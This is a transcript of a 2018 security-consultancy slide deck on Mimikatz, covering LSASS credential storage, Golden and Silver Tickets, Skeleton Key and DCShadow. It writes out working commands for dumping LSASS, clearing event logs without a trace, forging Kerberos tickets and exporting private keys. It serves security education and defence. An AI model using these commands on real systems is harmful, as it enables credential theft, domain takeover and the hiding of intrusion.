Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Mimikatz

Prashant
August 31, 2018

 Mimikatz

Just another presentation on mimikatz

Prashant

August 31, 2018
Tweet

More Decks by Prashant

Other Decks in Technology

Transcript

  1. Sydney Level 8, 59 Goulburn Street Sydney NSW 2000 Melbourne

    Level 15, 401 Docklands Drive Docklands VIC 3008 Tel. 1300 922 923 Intl. +61 2 9290 4444 www.senseofsecurity.com.au Sense of Security Pty Ltd ABN 14 098 237 908 @ITSecurityAU Compliance, Protection & Business Confidence 31 August 18 mimikatz A little tool to play with Windows security Prashant Mahajan
  2. • Benjamin DELPY, you can contact him on Twitter (@gentilkiwi)

    or by mail (benjamin [at] gentilkiwi.com) or visit his blog (http://blog.gentilkiwi.com/) • Vincent LE TOUX, a few contributions to mimikatz including the DCSync function in lsadump module, you contact him on Twitter (@mysmartlogon) or by mail (vincent.letoux [at] gmail.com) or visit his website (http://www.mysmartlogon.com) 31 August 18 Authors
  3. Agenda 31 August 18 • sekurlsa::logonpasswords • Just scratching the

    surface on the capabilities • SekurLSA module • Event module • DCSync • Golden Ticket • Silver Ticket • Skeleton Key • SIDHistory • DCShadow
  4. • After a user logs on, a variety of credentials

    are generated and stored in the Local Security Authority Subsystem Service (LSASS) process in memory. • This is meant to facilitate Single Sign-On (SSO) ensuring a user isn’t prompted each time resource access is requested. • The credential data may include Kerberos tickets, NTLM password hashes, LM password hashes (if the password is <15 characters, depending on Windows OS version and patch level), and even clear-text passwords to support WDigest and SSP authentication among others. 31 August 18 Credentials in Memory ? ! https://adsecurity.org/?page_id=1821
  5. 31 August 18 Credential Data Chart Benjamin Delpy posted an

    Excel chart on OneDrive (no longer available) http://adsecurity.org/wp-content/uploads/2014/11/Delpy-CredentialDataChart.png
  6. procdump.exe -accepteula -ma lsass.exe lsass.dmp sekurlsa::minidump lsass.dmp sekurlsa::logonpasswords 31 August

    18 ProcDump or Task Manager https://docs.microsoft.com/en-us/sysinternals/downloads/procdump
  7. The Local Security Authority (LSA), which resides within the Local

    Security Authority Security Service (LSASS) process, validates users for local and remote sign-ins and enforces local security policies. The Windows 8.1 operating system provides additional protection for the LSA to prevent code injection by non-protected processes. This provides added security for the credentials that the LSA stores and manages. This protected process setting for LSA can be configured in Windows 8.1 but is on by default in Windows RT 8.1 and cannot be changed. 31 August 18 RunAsPPL https://docs.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/credentials-protection-and-management
  8. privilege::debug Get Debug Privs J event::drop Patch Events service to

    avoid new events. event::clear Clear the event log without any log cleared event (1102) being logged. 31 August 18 Event module
  9. • A Golden Ticket (GT) is a TGT using the

    KRBTGT NTLM password hash to encrypt and sign. • A GT can be created to impersonate any user (real or imagined) in the domain as a member of any group in the domain (providing a virtually unlimited amount of rights) to any and every resource in the domain. • Since the GT is an authentication ticket, its scope is the entire domain (and the AD forest by leveraging SID History) since the TGT is used to get service tickets (TGS) used to access resources. • The GT contains user group membership information (PAC) and is signed and encrypted using the domain’s Kerberos service account (KRBTGT) which can only be opened and read by the KRBTGT account. 31 August 18 Golden Ticket https://adsecurity.org/?page_id=1821
  10. To summarize, once an attacker gets access to the KRBTGT

    password NTLM/RC4/AES128/AES256, they can create Golden Tickets (TGT) that can provide access to anything in AD at any time. Mimikatz adds the following groups to the ticket by default: • Domain Users SID: S-1-5-21<DOMAINID>-513 • Domain Admins SID: S-1-5-21<DOMAINID>-512 • Schema Admins SID: S-1-5-21<DOMAINID>-518 • Enterprise Admins SID: S-1-5-21<DOMAINID>-519 (this is only effective when the forged ticket is created in the Forest root domain, though add using /sids parameter for AD forest admin rights) • Group Policy Creator Owners SID: S-1-5-21<DOMAINID>-520 31 August 18 Golden Ticket https://adsecurity.org/?page_id=1821
  11. kerberos::golden /user:doesnotexist /domain:sos.labs /id:9999 /sid:S-1-5-21-2872888145-3513486857-3924934394 /krbtgt:99d196d2968eb268cb69529153a48623 /ptt • /user –

    account to be impersonated or any username • /id – RID of the account to be impersonated. This could be a real account ID, such as the default administrator ID of 500, or a fake ID. • /groups - list of groups to which the account in the ticket will belong • /sids – to insert a SID into the SIDHistory attribute of the account in the ticket • /ptt – Pass the Ticket to load the golden ticket into the current session 31 August 18 Golden Ticket
  12. A Silver Ticket is a TGS (similar to TGT in

    format) using the AD computer/service account (can be identified by SPN) NTLM password hash to encrypt and sign. Mimikatz adds the following groups to the ticket by default: • Domain Users SID: S-1-5-21<DOMAINID>-513 • Domain Admins SID: S-1-5-21<DOMAINID>-512 • Schema Admins SID: S-1-5-21<DOMAINID>-518 • Enterprise Admins SID: S-1-5-21<DOMAINID>-519 (this is only effective when the forged ticket is created in the Forest root domain, though add using /sids parameter for AD forest admin rights) • Group Policy Creator Owners SID: S-1-5-21<DOMAINID>-520 31 August 18 Silver Ticket https://adsecurity.org/?page_id=1821
  13. kerberos::golden /user:user1 /domain:sos.labs /id:1108 /sid:S-1-5-21-2872888145-3513486857-3924934394 /target:dc1.sos.labs /rc4:fbdcd5041c96ddbd82224270b57f11fc /server:http /ptt •

    /target –the host (SPN value). sos.labs domain has dc1.sos.labs • /service –the name of the service that we will create tickets for (must be a service running as the service account) • /user –the user that the ticket will be created for, and this can be any user account whatsoever, even user accounts that do not exist • /groups - list of groups to which the account in the ticket will belong to. Domain Admins is included by default • /rc4 – NTLM hash of the account or /aes128 /aes256 keys 31 August 18 Silver Ticket
  14. • Inject Skeleton Key into LSASS process on Domain Controller.

    • This enables all user authentication to the Skeleton Key patched DC to use a “master password (mimikatz)” (aka Skeleton Keys) as well as their usual password. • Reboot removes the Skeleton Key injection. 31 August 18 Skeleton Key
  15. What can you do ? • Add user to privileged

    groups such as Domain Admins, Enterprise Admins • Add SIDHistory • Change PrimaryGroupID • Etc 31 August 18 DCShadow
  16. The following permissions on AD Object’s are required: Domain object

    • DS-Install-Replica (Add/Remove Replica in Domain) • DS-Replication-Manage-Topology (Manage Replication Topology) • DS-Replication-Synchronize (Replication Synchornization) Sites object in the Configuration container • CreateChild and DeleteChild Computer object of the attacker's machine (which is registered as a Fake DC) • WriteProperty Target object (user or computer or ADSPath) • WriteProperty 31 August 18 DCShadow https://github.com/samratashok/nishang/blob/master/ActiveDirectory/Set-DCShadowPermissions.ps1
  17. mimikatz # privilege::debug Privilege '20' OK mimikatz # crypto::cng "KeyIso"

    service patched mimikatz # crypto::capi Local CryptoAPI patched mimikatz # crypto::certificates /export * System Store : 'CURRENT_USER' (0x00010000) * Store : 'My' mimikatz # crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE mimikatz # crypto::keys /export 31 August 18
  18. Sydney Level 8, 59 Goulburn Street Sydney NSW 2000 Melbourne

    Level 15, 401 Docklands Drive Docklands VIC 3008 Tel. 1300 922 923 Intl. +61 2 9290 4444 www.senseofsecurity.com.au Sense of Security Pty Ltd ABN 14 098 237 908 @ITSecurityAU Security, it’s all we do. Knowledge, Experience & Trust. Questions?
  19. Sydney Level 8, 59 Goulburn Street Sydney NSW 2000 Melbourne

    Level 15, 401 Docklands Drive Docklands VIC 3008 Tel. 1300 922 923 Intl. +61 2 9290 4444 www.senseofsecurity.com.au Sense of Security Pty Ltd ABN 14 098 237 908 @ITSecurityAU Security, it’s all we do. Knowledge, Experience & Trust. Thank You! © 2002 – 2018 Sense of Security Pty Limited. All rights reserved. Some images used under license from Shutterstock.com or with permission from respective trademark owners. No part of this publication may be reproduced, distributed, or transmitted in any form or by any means, including photocopying, recording, or other electronic or mechanical methods, without the prior written permission of the publisher.